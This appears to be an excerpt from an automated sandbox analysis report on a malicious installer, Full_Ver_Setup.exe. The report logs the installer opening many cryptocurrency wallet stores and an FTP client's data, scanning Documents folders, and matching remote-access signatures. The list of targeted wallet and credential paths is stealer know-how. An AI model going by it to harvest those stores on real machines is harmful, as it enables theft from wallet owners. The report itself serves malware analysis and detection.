Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\DVWHKMNFNN Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: Yara match File source: Process Memory Space: Full_Ver_Setup.exe PID: 6476, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: Full_Ver_Setup.exe PID: 6476, type: MEMORYSTR
Source: Yara match File source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs